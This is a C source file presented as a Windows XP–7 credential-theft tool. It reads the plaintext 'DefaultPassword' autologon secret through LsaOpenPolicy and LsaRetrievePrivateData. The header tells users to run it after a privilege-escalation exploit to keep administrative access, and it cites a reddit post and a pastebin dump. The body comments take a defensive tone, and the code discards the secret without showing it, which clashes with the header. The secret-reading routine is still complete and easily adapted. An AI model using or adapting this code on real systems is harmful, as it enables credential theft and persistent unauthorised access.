LsaRetrievePrivateData User Credential Theft on Windows XP-7
/*
* LsaRetrievePrivateData User Credential Theft on Windows XP-7
* ============================================================
*
* Requires admin privileges to run effectively (use privilege escalation
* exploit first then use this to get password so you are no longer dependent
* on the exploit)
*
* Seen on reddit: https://www.reddit.com/r/Malware/comments/779v21/til_you_can_maintain_administrative_access/
* Code from pastebin dump: https://pastebin.com/u992uP5e
*/
#include <Windows.h>
#include <stdio.h>
#include <NTSecAPI.h>
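int wmain(void)
{
    /*
     * Open the local LSA policy object and read the "DefaultPassword" LSA
     * secret -- the plaintext Winlogon autologon password, when one has been
     * configured -- then release it again without using it.
     *
     * Returns ERROR_SUCCESS (0) when the secret was read, otherwise the Win32
     * error code derived from the failing NTSTATUS (also printed to stdout).
     *
     * Mitigation note: any local administrator can read this secret through
     * the documented LSA policy API, so the only durable defence is not to
     * store a plaintext autologon password in the first place.
     */
    NTSTATUS Status = 0;
    DWORD dwError = ERROR_SUCCESS;
    LSA_UNICODE_STRING uString;
    PLSA_UNICODE_STRING Data = NULL;   /* NULL so the cleanup path never frees garbage */
    LSA_HANDLE hHandle = NULL;         /* likewise for LsaClose */
    LSA_OBJECT_ATTRIBUTES Attributes;
    LPCWSTR lpPassword = L"DefaultPassword";

    /* LSA ignores the attribute contents but expects the structure zeroed. */
    RtlZeroMemory(&Attributes, sizeof(Attributes));

    Status = LsaOpenPolicy(NULL, &Attributes, POLICY_ALL_ACCESS, &hHandle);
    if (Status != 0)                   /* NTSTATUS: 0 is success */
        goto FAILURE;

    /* LSA_UNICODE_STRING lengths are in bytes, not characters. Length excludes
     * the terminator; MaximumLength includes it, so add one WCHAR, not one byte. */
    size_t cbName = wcslen(lpPassword) * sizeof(WCHAR);
    uString.Buffer = (PWSTR)lpPassword;
    uString.Length = (USHORT)cbName;
    uString.MaximumLength = (USHORT)(cbName + sizeof(WCHAR));

    Status = LsaRetrievePrivateData(hHandle, &uString, &Data);
    if (Status != 0)
        goto FAILURE;
    goto CLEANUP;

FAILURE:
    /* LSA functions return NTSTATUS values and do not set the thread's
     * last-error value, so GetLastError() would report an unrelated code. */
    dwError = LsaNtStatusToWinError(Status);
    printf("Operation failed: %lu\r\n", dwError);   /* DWORD is unsigned long */

CLEANUP:
    if (Data) {
        /* Scrub the plaintext before handing the buffer back to LSA's heap. */
        if (Data->Buffer)
            SecureZeroMemory(Data->Buffer, Data->Length);
        LsaFreeMemory(Data);
    }
    if (hHandle)
        LsaClose(hHandle);
    return (int)dwError;
}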